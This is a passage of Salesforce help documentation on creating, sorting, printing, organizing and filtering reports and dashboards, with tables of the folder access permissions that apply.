Drag it to where you’d like it to appear.To reorder a column

Click  for the column and select Sort Ascending or Sort Descending. Sorting applies to
all items in the list view, including the ones on subsequent pages.

To sort a column

Click  in the lower left corner of the list and select the desired setting. You can view 10,
25, 50, 100, or 200 records at a time. When you change this setting, you return to the first
page of list results.

Once set, however, you view the same number of records throughout the list. The record
display setting on the Reports tab doesn’t affect list views elsewhere in Salesforce.

To change the number of records
displayed per page

Figure 18: Select Column Header for Sorting and Hiding Columns

See Also:
Get Started with Reports
Gather Data with Reports

The Report Run Page
The Report Run page lets you control what happens to your report when you run it.

Available in: All editions except Database.com

User Permissions Needed

“Run Reports”To run reports:

“Schedule Reports”To schedule reports:

“Create and Customize Reports”

AND

“Report Builder”

To create, edit, and delete reports:
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From the report run page, you can:

• Display a Chatter feed of updates and posts about the report.

• View Report Generation Status.

• Choose hierarchy options.

• Change top-level groupings using the Summarize information by drop-down.

• Change Time Frame and View options.

• Click Run Report to immediately run or schedule the report.

• Click Show Details to view all data or Hide Details to show only summary information.

• Click Customize to open the report in report builder.

• Print or export the report.

• Click Edit next to the chart to change its properties, or click Large, Medium, or Small to change its size.

• Sort report results.

• Edit or clear applied filter criteria.

• For summary and matrix reports, filter selected rows by a particular field. Select the rows you want to view, choose a field
to group by, then click Drill Down. For example, if you created an opportunity report that displays deals by industry, you
can select the industries that are doing well and group by Product Name to see which products are selling in that industry.
Click Clear to remove the drill-down filter.

See Also:
Get Started with Reports
Limit Report Results
Report Run Page Options

Sort Report Results
Sort a report by the data in a particular column by clicking on that column's heading. Clicking a column header sorts data
according to that column’s ascending order: text is sorted from A to Z, numerical data is sorted from lowest to highest, and
time/date data is sorted from earliest to latest.

Available in: All editions except Database.com

User Permissions Needed

“Run Reports”To sort report results:

Tip:  You can also group and subtotal your data to create subsets of information.

• To reverse the sort order, click the column heading a second time.

• If the floating report header is enabled for your organization, sort behavior is slightly different.
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Floating report headers keep the column headings on tabular reports in sight no matter how far users scroll down report
results. With floating report headers, users can scroll to the bottom of lengthy tabular reports without having to scroll back
to the top to view the names of the column headings. Users can also click floating report headers to sort data in a specific
column. When users sort data by clicking a floating report heading, the report refreshes and redirects users to the beginning
of report results.

See Also:
Get Started with Reports
Build a New Report
Subtotal Report Results

Print a Report
Print a report from the run page of a report using your browser’s print function.

Available in: All editions except Database.com

User Permissions Needed

“Run Reports” and “Export Reports”To print reports:

• Click Printable View from the report’s run page.

• From the browser dialog, do one of the following:

◊ Open the report with your browser and use your browser’s print function.

◊ Save the file in Excel and use the print option in Excel.

See Also:
Get Started with Reports
Export a Report
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Organize Reports
Keep your reports at your fingertips by sorting them into folders and moving them around as needed. If you have a lot of
reports, you can always use the search field to find the one you need.

See Also:
Get Started with Reports
Gather Data with Reports
Reports Home
Move a Report or Dashboard Between Folders
Delete a Report
Move a Report or Dashboard Between Folders
Delete a Report
Reports Home
Find a Report

Gather Data with Reports
Reports give you access to the data your organization has accumulated over time, enabling you to make informed decisions.
You can examine your organization’s data in almost infinite combinations, display it in easy-to-understand formats, and share
the resulting insights with others via dashboards.

Available in: All editions except Database.com

A report returns a set of records that meets certain criteria, and displays it in organized rows and columns. Report data can be
filtered, grouped, and displayed graphically as a chart. Reports are stored in folders, which control who has access. Reports
are stored in folders, which control who has access.

See Also:
Organize Reports
Get the Right Data into Your Report
Communicate Your Report Data Effectively
The Report Builder Screen
Build a Report From a Template

Reports Home
The Reports home page is your central place to work with reports and report folders.

Available in: All Editions except Database.com (The edition determines which reports you see.)
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User Permissions Needed

“Run Reports”To run reports:

“Schedule Reports”To schedule reports:

“Create and Customize Reports”

AND

“Report Builder”

To create, edit, and delete reports:

Click the Reports tab to display the reports home page. From this page, you can:

• Search for reports.

• Select or create a folder.

The Folder drop-down list includes all report folders you can access. The Report Folders section is not available in Personal,
Contact Manager, and Group Editions.

• Click the All Reports subtab to see all reports in folders you can access.

◊ Click Reorder Folders to change the order that folders appear on the subtab.

◊ Click Collapse All or Expand All to show or hide reports in folders.

• Click the Recent Reports subtab to see recent reports. Select recently viewed, created, or modified reports using the
drop-down.

• Click Create New Custom Report to begin a new report.

• Click a report name to run the report.

• If Chatter is enabled, click  or  to follow or stop following a report in your Chatter feed.
• Click Edit next to a report to customize it.

• Click Del to remove the report from the report folder. Deleted reports are moved to the Recycle Bin.

Note:  You can't delete reports used by dashboard components or analytic snapshots. To delete the report, you
must first delete the dashboard component or analytic snapshot

• Click Export to export a report directly to an Excel spreadsheet or CSV (comma-separated values) file.

See Also:
Organize Reports
The Report Builder Screen
Gather Data with Reports

Move a Report or Dashboard Between Folders
It’s a good practice to keep reports and dashboards organized in folders that reflect their function and audience. You can drag
and drop reports and dashboards from one folder to another.

Available in: All editions except Database.com

2574

Get Started with ReportsGet Started



User Permissions Needed

“Run Reports”To view the Reports tab:

Note:  You need edit access to folders before moving items between them. Moving items using drag-and-drop isn’t
supported in accessibility mode.

Move a report or dashboard between folders by dragging from the list view to a report or dashboard folder on the Folders
pane.

1. On the Reports tab list view, click and hold an item.

2. Drag the item into its destination folder in the Folders pane.

As you drag an item across a folder, a green check mark (1) indicates that the item can be moved into the selected folder.
Conversely, a red icon ( ) means that the item can’t be moved into a selected folder.

Keep the following in mind when moving items:

• Drag one item at a time.
• You can’t move items from installed AppExchange packages or standard report folders into other folders.
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• Move reports into report folders and dashboards into dashboard folders.

See Also:
Organize Reports

Delete a Report
You can delete a selected report from the Reports tab or from its run page.

Available in: All editions except Database.com

User Permissions Needed

“Create and Customize Reports”To delete reports in My Personal Custom Reports folder:

“Manage Public Reports”To delete reports in public folders:

1. Delete a report in one of two ways:

DescriptionOption

Next to the report, click  > Delete.To delete from the Reports tab

Click Delete.To delete from the report’s run page

2. Click OK.

Deleted reports are moved to the Recycle Bin. You can't delete reports in others’ personal folders. You also can’t delete
reports used by dashboard components or analytic snapshots unless you first delete the dashboard component or analytic
snapshot.

See Also:
Organize Reports
Prepare Analytic Snapshots
Adding and Editing Dashboard Components in Accessibility Mode
The Report Run Page
Create a Report

Customize the Reports Tab
On the Reports tab, you can modify your personal display to specify the order of the report folders.

Available in: All editions except Database.com
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User Permissions Needed

“Run Reports”To customize the Reports tab:

1. Click Reorder Folders next to the report subtabs.
2. To reposition the report folders, select a folder in the list box, and click the Up or Down arrow.

Tip:  Click the Top or Bottom arrow to move a folder to the top or bottom of the list.

3. Click Save.

See Also:
Get Started with Reports
Gather Data with Reports

Report Run Page Options
Customize the report run page to support the specific information you need for the way you work.

The following fields and buttons are available from the report run page, depending on your setup.

DescriptionOption

Opens the report builder to help you customize the report.Customize

Choose date-specific information about the records: created date, last updated date, and
date of last activity.

Date Field

Deletes the report. Deleted reports are moved to the Recycle Bin.Delete

Determines the currency type for report subtotals and amounts in the “converted” column
of any field. Available only for organizations using multiple currencies.

Amounts in reports are shown in their original currencies, and report totals are displayed
in your personal currency. To change the currency, click Show > Display Currencies

Display Currencies Using

Using, then select an active currency. For any amount, you can also choose to display the
“converted” column (for example, “Annual Revenue (converted)”), which will show
amounts in the selected currency.

Determines the division of records to include in the report. Select --Current-- to show
records in your current working division. Reports that are already scoped (such as My

Division

Cases or My Opportunity Team’s Accounts) include records in all divisions. Available
only if your organization uses divisions to segment data and you have the “Affected by
Divisions” permission. If you do not have the “Affected by Divisions” permission, your
reports include records in all divisions.

For summary and matrix reports, filter selected rows by a particular field. Select the rows
you want to view, choose a field to group by, then click Drill Down. For example, if you

Drill Down

created an opportunity report that displays deals by industry, you can select the industries
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DescriptionOption

that are doing well and group by Product Name to see which products are selling in
that industry. Click Clear to remove the drill-down filter.

Exports data from the report to a Microsoft® Excel spreadsheet or CSV (comma-separated
values) file.

Export Details

Provides options to view the report data based on role or territory hierarchy. View data
for an individual user, a role, or an entire organization. Available only for Professional,
Enterprise, Unlimited, and Developer Editions.

Hierarchy

Lets you display the report in Microsoft Excel format, for easy printing.Printable View

Specifies a scope based on opportunity ownership or opportunity team; limits the data
in an opportunity report.

Relationship to Opportunity

Specifies a time period for a report. You can limit the data by specific dates using any
standard or custom date field defined for the type of record in the report. Works with
From and To fields.

Range

Regenerates the report data based on current report settings.Run Report

Saves changes to one of your existing custom reports.Save

Saves parameter changes to any custom, standard, or public report under a new name,
without altering the original report.

Save As

Specifies which items to include in the report: just the records you own, or all records to
which you have access. Use this option to see team data in your report.

Show

Toggles the display to show all information or just summary information.Show/Hide Details

Provides subtotals for the fields you specify.Summarize information by

Choose to view the age of a case in days, hours, or minutes. The age of an open case is
the elapsed time from creation to the present. The age of a closed case is the elapsed time
from creation to the closing time of the case.

Units

See Also:
Get Started with Reports
The Report Run Page
Creating a Custom Report

Get Started with Dashboards
Once you’ve found the data you need, use a dashboard to find patterns, stay up to the minute on changes, and share knowledge
that you and your co-workers can act on in real time.

Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions
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User Permissions Needed

“Run Reports” AND access to dashboard folderTo view and refresh dashboards:

“Run Reports” AND “Manage Dashboards”To create dashboards:

“Run Reports” AND “Manage Dashboards”To edit and delete dashboards you created:

“Run Reports,” “Manage Dashboards,” AND “View All Data”To edit and delete dashboards you didn’t create:

• Users with a Salesforce Platform or Salesforce Platform One user license can only view a dashboard if the dashboard
running user also has the same license type. Consider creating separate dashboards for users with different license types.

• Dashboards in Group Edition organizations are view-only.

Clicking the Dashboards tab displays the dashboard you viewed most recently. The top of the page shows the time the
dashboard was refreshed last and the user whose permissions determine what data is visible on the dashboard. If you can’t
access a dashboard, verify your folder permissions.

See Also:
Use Dashboards on the iPad
Print a Dashboard
View Dashboard Lists
Refresh Dashboard Data
Filter Dashboard Data
Install the CRM Sample Dashboards from AppExchange
Manage Access to Reports and Dashboards
Share Insights with Dashboards
Refresh Dashboard Data

Use Dashboards on the iPad
Salesforce Mobile Dashboards for the iPad, available from the Apple App Store, lets you access dashboards you recently viewed
or are following when you’re on the go.

Available in: Enterprise, Unlimited, and Developer Editions

The mobile dashboards app keeps you in touch with your organization’s data, performance, and trends, whether you’re in the
office or on the road. Use this app to:

• Browse recently viewed dashboards, or ones you’re following

• Search for dashboards

• View individual dashboard components, highlight their values, and drill into reports for each

• Modify your report view

• Email a dashboard or an individual component to others

• View, post, and comment on a dashboard’s Chatter feed

• When offline, access some dashboards and reports you recently viewed in the app
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Note:  The app doesn’t support dynamic dashboards or dashboard filters.

You can download the app for free from the Apple App Store or from the AppExchange. You can use the mobile dashboards
app on all iPad models with iOS 5 or higher. The app is available in Salesforce Enterprise, Unlimited, and Developer Editions,
and additionally in any organization that has enabled REST API.

If you can access your Salesforce organization from your iPad, you can use the mobile dashboards app. Open the app and log
in using your Salesforce email and password. If you don’t have a Salesforce account, you can still explore the app by tapping
Demo.

Note:  Dashboard access for your iPad is available by default for your organization. If it isn't, an administrator must
enable it before you can log in to the app.

In the Salesforce Classic client application, the Dashboards tab displays if your Salesforce administrator has added the tab to
your mobile configuration.

See Also:
Get Started with Dashboards

Print a Dashboard
Print dashboards using your browser’s print option.

Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Run Reports” AND access to dashboard folderTo print dashboards:

• Set the paper orientation to print in landscape format so that it is wide enough for all three columns of dashboard
components.

• If necessary, resize your columns and remove the browser-imposed headers and footers.

See Also:
Get Started with Dashboards
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View Dashboard Lists
The dashboard list contains all the dashboards you can view.

Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Run Reports” AND access to dashboard folderTo view and refresh dashboards:

“Run Reports” AND “Manage Dashboards”To create dashboards:

“Run Reports” AND “Manage Dashboards”To edit and delete dashboards you created:

“Run Reports,” “Manage Dashboards,” AND “View All Data”To edit and delete dashboards you didn’t create:

1. From the Dashboards tab, click Go to Dashboard List.
The enhanced Reports tab lists your recently viewed dashboards in that dashboard's folder.

2. On the dashboard list page, select a folder to view a list of dashboards stored in that folder, or search with filters.
3. Click a dashboard name to display the dashboard.

4. Click  next to a dashboard name to edit or delete a dashboard.

Note: Dashboards in Group Edition organizations are view-only.

5. If Chatter is enabled, click  or  to follow or stop following a dashboard in your Chatter feed.

See Also:
Get Started with Dashboards
Share Insights with Dashboards
Get Started with Dashboards

Refresh Dashboard Data
Click Refresh to load the latest data into the dashboard. The data is as current as the date and time displayed after As of...
at the top right corner of the dashboard.

Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Run Reports” AND access to dashboard folderTo refresh dashboard data:
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1. Click Refresh to replenish your dashboard with the most recent data.
When dashboard data is being refreshed, the Refresh button changes to Refreshing... You can leave the dashboard and
do other things in Salesforce while the data refreshes.

Tip:  If your dashboard data doesn't refresh after ten minutes, the refresh automatically stops. If necessary, click
Refresh again.

When you refresh a dashboard, the dashboard data refreshes for anyone else in your organization that has access to that
dashboard. Additional refreshes submitted during a refresh and up to one minute after the completion of a refresh are ignored;
users view the most current data.

When you change filters on a dashboard, the dashboard shows previously cached data, if it exists. If no data exists, the dashboard
fetches the latest. Either way, the dashboard’s “Last Refreshed” date shows you the timestamp for the data you’re viewing.

See Also:
Get Started with Dashboards

Filter Dashboard Data
As an administrator, you don’t need to clone dashboards along with source reports for each subset of data. With a single filtered
dashboard, you can serve data needs for a wider audience. Filters are available for both dynamic and standard single-user
dashboards. When a dashboard is filtered by a user, the filtered view is saved so that the next time they visit, the same filters
are applied to the dashboard data. To see data unfiltered, they can clear each filter on the dashboard.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

Create up to 3 filters on a dashboard. Each filter can have up to 10 options defined by filter operators and values. Contact
salesforce.com to increase the filter options limit. A maximum of 50 filter options is possible.

You can filter on picklists, lookups, and checkboxes, and on text, numeric, date, and date/time fields.

Note:

• Filters can’t be added to dashboards that contain Visualforce or s-control components.

• It’s not possible to filter on bucket fields.

• Scheduling or emailing a filtered dashboard returns unfiltered data.
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• You can’t filter data on a joined report in dashboard view or add a filter to a dashboard that only has joined reports.

See Also:
Get Started with Dashboards
Add a Dashboard Filter
Dashboard Filter Examples
Apply a Dashboard Filter
Data Shown in Filtered Dashboards
Add a Dashboard Filter
Apply a Dashboard Filter
Create a Dashboard
Set Up Dynamic Dashboards

Add a Dashboard Filter
To create a dashboard filter, select a field that contains the type of information you want to filter on, then define how the filter
returns the data.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Run Reports” AND “Manage Dashboards”To create dashboards:

Filters on a dashboard allow you to choose different views of data. Create up to 3 filters on a dashboard. Each filter can have
up to 10 options defined by filter operators and values. Contact salesforce.com to increase the filter options limit. A maximum
of 50 filter options is possible.

The field you select for the filter may have equivalent fields. Equivalent fields share the same underlying object as the field you
select for the filter. You can use equivalent fields to filter components that don’t have the exact field you selected for the filter,
or to filter some components differently. For example, if you filter on the Account Owner field, equivalent fields may include
Opportunity Owner or Opportunity Created by, as all three are part of the User object. When equivalents exist for
a field, hover over  in the Filter dialog to see the list.

When you edit a dashboard, you can see how each component is being filtered under Filtered By. If equivalent fields are
available for a component, you can select a different field to filter the component.

1. Create a dashboard with at least one component and data source (report).
2. Click Add Filter.
3. Select the field to filter on from the Field drop-down. The drop-down shows fields that can be used to filter all components.

To see equivalent fields for your selection, click .
4. Optionally, enter a display label to identify the filter on the dashboard builder and view pages. If your filter has many

equivalent fields, we recommend using a label that works for all components.
5. Under Filter Options, select an operator and provide values for the option. Options with multiple values are treated as OR

conditions.
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6. Click Add Row to add additional options.
7. Click OK. When you click OK, you can see how the filter is applied on each component. If equivalent fields are available

for a component, you can select which one to use to filter the component.

To modify or delete an existing filter, from the filter drop-down, select Edit Filter or Remove Filter.

See Also:
Filter Dashboard Data
Filter Dashboard Data
Apply a Dashboard Filter
Filter Operators

Dashboard Filter Examples
Filters on a dashboard allow you to choose different views of data. When you filter a dashboard, the filtered view is saved on
the dashboard until you change filters. Without dashboard filters, you'd have to create multiple dashboards, each with its own
set of filtered reports.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

Sales Data for Each Account Type

Filter a sales dashboard to let viewers see sales data for each type of account (prospect, customer, partner, etc.). Create a single
dashboard based on a single set of reports, then add a dashboard filter on the Account Type field.

Sales Performance by Products

Create a sales dashboard that lets viewers track sales performance by products. To do so, create a dashboard with key performance
indicators, like closed revenue. Add a filter on the Product Name field so viewers can see performance by product.
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Deals for Different Account Segments

Show how different types of deals are performing across different account segments by creating a dashboard with two filters.
Create a filter for Annual Revenue that contains several ranges that reflect how your organization segments accounts, then
create a filter on opportunity Type, and finally add a filter to show deals by Region. Create this as a dynamic dashboard to
let the entire sales organization use it: managers can use it to view the performance of their teams, while reps can use it to
monitor their own performance.

See Also:
Filter Dashboard Data
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Apply a Dashboard Filter
Filter a dashboard to analyze the information interactively. When you filter a dashboard, the filtered view is preserved so that
the next time you see the dashboard, data is filtered by the same view.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Run Reports” AND access to dashboard folderTo view and refresh dashboards:

Note:  All components on the dashboard might not be filtered on the same field. The person who created or edited
the dashboard specifies which field is used.

1. Open a dashboard filter.

Notice how filters you applied last time are selected.

2. Select a filter option from the drop-down.
For example, select Type equals Prospect to show only consulting accounts across all the dashboard components.

3. If the dashboard has additional filters, choose those filter options as well.

To see data unfiltered, click Clear Filter in each dashboard filter drop-down.

See Also:
Filter Dashboard Data
Add a Dashboard Filter
Filter Dashboard Data
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Data Shown in Filtered Dashboards
When you change filters on a dashboard, the dashboard shows previously cached data, if it exists. If no data exists, the dashboard
fetches the latest. Either way, the dashboard’s “Last Refreshed” date shows you the timestamp for the data you’re viewing.
Click Refresh to get the most recent data.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

See Also:
Filter Dashboard Data

Install the CRM Sample Dashboards from AppExchange
Use the CRM sample dashboards from AppExchange as a starting point to build dashboards that meet your business needs.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Download AppExchange Packages”To install packages:

“Run Reports” AND “Manage Dashboards”To create dashboards:

The CRM sample dashboards package from AppExchange offers best practice dashboards with underlying reports that are
based on your organization’s standard objects and fields. These are sales, marketing, service, and support dashboards you can
use to track business processes and key performance metrics for yourself, your team, and your organization. Dashboards in
this package include:

• Sales & Marketing Dashboards

◊ Marketing Executive Dashboard
◊ Sales Executive Dashboard
◊ Sales Manager Dashboard
◊ Salesperson Dashboard

• Customer Service Dashboards

◊ Agent Supervisor Overview Dashboard
◊ Service Executive Overview Dashboard
◊ Service KPIs Dashboard

1. In AppExchange, search for “Salesforce CRM Dashboards” and click Get it Now.
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2. To install the sample dashboards, install the package.

See Also:
Get Started with Dashboards

Manage Access to Reports and Dashboards
Access to reports and dashboards is controlled through settings for the folder they are stored in. To give others access to your
reports or dashboards, place them in a shared folder. To prevent others from accessing your reports, place them in personal
folders that only you can access.

Available in: All Editions except Database.com

Report folders not available in: Contact Manager, Group, and Personal Editions

User Permissions Needed

“Manage Public Reports”To create, edit, and delete public report folders:

“Manage Dashboards” AND “View All Data”To create, edit, and delete public dashboard folders:

To access report or dashboard folders go to the Reports tab. On the tab, in the folders pane, click  and select New Report

Folder or New Dashboard Folder to create a folder, or click  on a folder to edit.

Consider the following when you edit reports or dashboards you didn’t create or when you’re try to share reports with others:

• You can modify the contents of a folder only if the folder access level is set to Read/Write. Only users with the “Manage
Public Reports” or “Manage Public Dashboards” can delete or change a Read Only folder. Regardless of permissions or
folder settings, you can't edit any unfiled folders or others’ personal folders.

• Administrators, or users with the “Manage Public Reports” and “Create and Customize Reports” permissions, can create
custom reports that all users can view. They can also organize reports by creating custom report folders and configuring
which groups of users have access to them. Note that public reports and report folders are not available with Personal,
Contact Manager, and Group Editions.

• To make a report public, run the report and click Save As. Give the report a name and choose a public report folder.

See Also:
Get Started with Dashboards
Access to Report Folders
Access to Dashboard Folders
Access to Report Folders
Access to Dashboard Folders
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Access to Report Folders
Folder access is controlled by permissions. Users must have certain permissions to access public, hidden, or shared report
folders.

Available in: All Editions except Database.com

Report folders not available in: Contact Manager, Group, and Personal Editions

The following tables show the permissions that users must have to access the three different types of report folders: public,
hidden, and shared folders.

Public Folders
The following permissions apply to folders with these visibility settings:
• This folder is accessible by all users, including portal users

• This folder is accessible by all users, except for portal users

Permissions to Access Read/Write FoldersPermissions to Access Read-Only FoldersAccess Level

Any of the following:Any of the following:Read
• “Run Reports”• “Run Reports”

• •“Manage Public Reports” “Manage Public Reports”
•• “View All Data”“View All Data”

“Create and Customize Reports”“Manage Public Reports”Write New

“Manage Public Reports”“Manage Public Reports”Modify/Delete

Hidden Folders
The following permissions apply to folders that have this visibility setting:
• This folder is hidden from all users

Permissions to Access Read/Write FoldersPermissions to Access Read-Only FoldersAccess Level

“View All Data”“View All Data”Read

“Manage Public Reports”“Manage Public Reports”Write New

“Manage Public Reports”“Manage Public Reports”Modify/Delete

Shared Folders

Permissions to Access Read/Write FoldersPermissions to Access Read-Only FoldersAccess Level

Any of the following:Any of the following:Read
• “Run Reports” (for shared users)• “Run Reports” (for shared users)

• •“Manage Public Reports” “Manage Public Reports” (for shared users)
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Permissions to Access Read/Write FoldersPermissions to Access Read-Only FoldersAccess Level

• “View All Data”• “View All Data”

“Create and Customize Reports” (for shared
users)

“Manage Public Reports”Write New

“Manage Public Reports”“Manage Public Reports”Modify/Delete

See Also:
Manage Access to Reports and Dashboards

Access to Dashboard Folders
Folder access is controlled by permissions. Users must have certain permissions to access public, hidden, or shared dashboard
folders.

Available in: All Editions except Database.com

Report folders not available in: Contact Manager, Group, and Personal Editions

The following tables show the permissions that users must have to access the three different types of dashboard folders: public,
hidden, and shared folders.

Public Folders
The following permissions apply to folders with these visibility settings:
• This folder is accessible by all users, including portal users

• This folder is accessible by all users, except for portal users

Permissions to Access Read/Write FoldersPermissions to Access Read-Only FoldersAccess Level

“Run Reports”“Run Reports”Read

Both of the following:All of the following:Write New
• “Run Reports”• “Run Reports”

• •“Manage Dashboards” “Manage Dashboards”
• “View All Data”

All of the following:All of the following:Modify/Delete
• “Run Reports”• “Run Reports”

• •“Manage Dashboards” “Manage Dashboards”
•• “View All Data”“View All Data”
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Hidden Folders
The following permissions apply to folders that have this visibility setting:
• This folder is hidden from all users

Permissions to Access Read/Write FoldersPermissions to Access Read-Only FoldersAccess Level

Both of the following:Both of the following:Read
• “Run Reports”• “Run Reports”

• •“View All Data” “View All Data”

All of the following:All of the following:Write New
• “Run Reports”• “Run Reports”

• •“Manage Dashboards” “Manage Dashboards”
•• “View All Data”“View All Data”

All of the following:All of the following:Modify/Delete
• “Run Reports”• “Run Reports”

• •“Manage Dashboards” “Manage Dashboards”
•• “View All Data”“View All Data”

Shared Folders

Permissions to Access Read/Write FoldersPermissions to Access Read-Only FoldersAccess Level

“Run Reports”“Run Reports”Read

Both of the following:All of the following:Write New
• “Run Reports”• “Run Reports”

• •“Manage Dashboards” “Manage Dashboards”
• “View All Data”

All of the following:All of the following:Modify/Delete
• “Run Reports”• “Run Reports”

• •“Manage Dashboards” “Manage Dashboards”
•• “View All Data”“View All Data”

See Also:
Manage Access to Reports and Dashboards
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GATHER DATA

Gather Data with Reports
Reports give you access to the data your organization has accumulated over time, enabling you to make informed decisions.
You can examine your organization’s data in almost infinite combinations, display it in easy-to-understand formats, and share
the resulting insights with others via dashboards.

Available in: All editions except Database.com

A report returns a set of records that meets certain criteria, and displays it in organized rows and columns. Report data can be
filtered, grouped, and displayed graphically as a chart. Reports are stored in folders, which control who has access. Reports
are stored in folders, which control who has access.

See Also:
Organize Reports
Get the Right Data into Your Report
Communicate Your Report Data Effectively
The Report Builder Screen
Build a Report From a Template
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Get the Right Data into Your Report
A well-designed report helps you turn raw data into information people can act on. Summarize values and group them into
meaningful categories, filter out irrelevant facts, and gather data about multiple objects at once.

See Also:
Gather Data with Reports
Build a New Report
Build a Report From a Template
Create Your Own Custom Report Type
Report on Related Objects with Cross Filters
Categorize Data Quickly with Buckets
Combine Different Types of Information in a Joined Report
Categorize Data Quickly with Buckets
Group Your Report Data
Summarize Your Report Data
Filter Your Report Data
Tips for Working with Cross Filters
Combine Different Types of Information in a Joined Report
Subtotal Report Results

Build a New Report
Report Builder is a drag-and-drop tool for accessing your data quickly and comprehensively. Use it to set up new reports and
edit existing ones.

Available in: All editions except Database.com

User Permissions Needed

“Create and Customize Reports”

AND

“Report Builder”

To create, edit, and delete reports:

Watch a Demo: Getting Started with Report Builder (2:34 minutes)
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To customize an existing report using report builder, click the name of a report and click Customize. To optimize screen real
estate, report builder uses a compressed page header. To view your application tabs, simply close the builder or click the
Salesforce logo.

See Also:
Get the Right Data into Your Report
Choose a Report Type
Choose a Report Format
Create a Report
Creating a Custom Report
Create a Custom Report in Accessibility Mode
Group Your Report Data
Keep Working While Your Report Preview Loads
The Report Builder Screen
Report Fields
Summarize Your Report Data
Filter Your Report Data
Save Your Report
Keep Working While Your Report Preview Loads
Create a Report
Create a Report
Report Fields
Choose a Report Type
The Report Builder Screen
Choose a Report Format
Creating a Custom Report
Combine Different Types of Information in a Joined Report

Choose a Report Type

A report type is a set of rules that determine which records and fields appear in a report. You can start with one of the available
standard report types, or use a custom report type provided by your administrator.

Available in: All editions except Database.com

User Permissions Needed

“Create and Customize Reports”

AND

“Report Builder”

To create, edit, and delete reports:

Choosing the right report type is one of the most important steps in creating a report.

To create a new report:
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1. From the Reports tab, click New Report.
2. Select the report type for the report and click Create.
3. Customize the report.

See Also:
Build a New Report
Choose a Report Format
Set Up a Custom Report Type

Choose a Report Format

A report can use the tabular, summary, matrix, or joined format. Choose a format that’s complex enough to capture the data
you want to show, but simple enough to communicate it effectively.

Available in: All editions except Database.com

User Permissions Needed

“Create and Customize Reports”

AND

“Report Builder”

To create, edit, and delete reports:

Choose one of the following report formats using the Format menu of the report builder. Tabular format is the default.

DescriptionFormat

Tabular reports are the simplest and fastest way to look at data. Similar to a spreadsheet, they consist
simply of an ordered set of fields in columns, with each matching record listed in a row. Tabular reports

Tabular

are best for creating lists of records or a list with a single grand total. They can't be used to create groups
of data or charts, and can't be used in dashboards unless rows are limited. Examples include contact
mailing lists and activity reports.

Summary reports are similar to tabular reports, but also allow users to group rows of data, view subtotals,
and create charts. They can be used as the source report for dashboard components. Use this type for a

Summary

report to show subtotals based on the value of a particular field or when you want to create a hierarchical
list, such as all opportunities for your team, subtotaled by Stage and Owner. Summary reports with
no groupings show as tabular reports on the report run page.

Matrix reports are similar to summary reports but allow you to group and summarize data by both rows
and columns. They can be used as the source report for dashboard components. Use this type for

Matrix

comparing related totals, especially if you have large amounts of data to summarize and you need to
compare values in several different fields, or you want to look at data by date and by product, person,
or geography. Matrix reports without at least one row and one column grouping show as summary
reports on the report run page.
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DescriptionFormat

Building Matrix Reports (2:00 minutes)

Joined reports let you create multiple report blocks that provide different views of your data. Each block
acts like a “sub-report,” with its own fields, columns, sorting, and filtering. A joined report can even
contain data from different report types.

Introducing Joined Reports in Salesforce (3:19 minutes)

Joined

Changing the Report Format

Changing the format affects filters and groupings, as follows:

What Happens?When you change...

The Rows to Display filter is removed.Tabular to Summary or Matrix

All groupings, charts, and custom summary formulas are removed from the report.
Grouping fields are not converted to columns in the tabular report. If the joined

Summary, Matrix, or Joined to Tabular

report contained multiple blocks, the columns from only the first block are included
in the tabular report.

The first summary grouping becomes the first row grouping. The second becomes
the first column grouping. The third becomes the second row grouping.

If you're using the report wizard, the third summary grouping is removed.

Summary to Matrix

The first row grouping becomes the first summary grouping. The second row
grouping becomes the third summary grouping. The first column grouping becomes
the second summary grouping. The second column grouping is removed.

If you're using the report wizard, both the second row grouping and second column
grouping are removed.

Matrix to Summary

The existing report becomes the first block in the joined report, and the report type
becomes the principle report type for the joined report.

Tabular, Summary, or Matrix to Joined

Joined report blocks are formatted as summary reports, so if you switch from a
summary to a joined report, your groupings stay the same. If you switch from a
matrix to a joined report, groupings are converted the same way as when you switch
from a matrix to a summary report.

The following items aren’t supported in joined reports, and aren’t converted:

• Bucket fields
• Cross filters
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What Happens?When you change...

• The Rows to Display filter

See Also:
Build a New Report
Choose a Report Type
Create a Report
Build a New Report

Create a Report

If you don’t have an existing report to clone, you can create a new report.

Available in: All editions except Database.com

User Permissions Needed

“Create and Customize Reports”

AND

“Report Builder”

To create, edit, and delete reports:

To create a new report:

1. From the Reports tab, click New Report.
2. Select the report type for the report, and click Create.
3. Customize your report, then save or run it.

See Also:
Build a New Report
Choose a Report Format
Creating a Custom Report
The Report Builder Screen
Run a Report

Creating a Custom Report

You can customize standard reports, or you can build custom reports from scratch to suit the exact needs of your organization.

Available in: All editions except Database.com
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User Permissions Needed

“Run Reports”To run reports:

“Schedule Reports”To schedule reports:

“Create and Customize Reports”

AND

“Report Builder”

To create, edit, and delete reports:

Users with the “Manage Custom Report Types” permission can define custom report types that extend the types of reports
from which all users in their organization can create or update custom reports. A report type defines the set of records and
fields available to a report based on the relationships between a primary object and its related objects. Reports display only
records that meet the criteria defined in the report type. Salesforce provides a set of pre-defined standard report types;
administrators can create custom report types as well.

Users with the “Manage Analytic Snapshots” permission can create and schedule snapshots. An analytic snapshot lets you
report on historical data. Authorized users can save tabular or summary report results to fields on a custom object, then map
those fields to corresponding fields on a target object. They can then schedule when to run the report to load the custom
object's fields with the report's data. Analytic snapshots enable you to work with report data similarly to how you work with
other records in Salesforce.

See Also:
Build a New Report
Create a Report
Create a Custom Report in Accessibility Mode

Create a Custom Report in Accessibility Mode

Available in: All editions except Database.com

User Permissions Needed

“Create and Customize Reports”To create, edit, and delete reports:

Note:  This topic only applies if you're not using report builder. Report builder is a visual editor for reports.

To create a new custom report using the custom report wizard:

1. From the Reports tab, choose the Create New Custom Report button.
2. Select the type of data for the report, and click Next.

To create reports on custom objects, choose the Other Reports report type category unless the custom object has a
relationship with a standard object. When the custom object has a master-detail relationship with a standard object, or is
a lookup object on a standard object, select the standard object for the report type category instead.
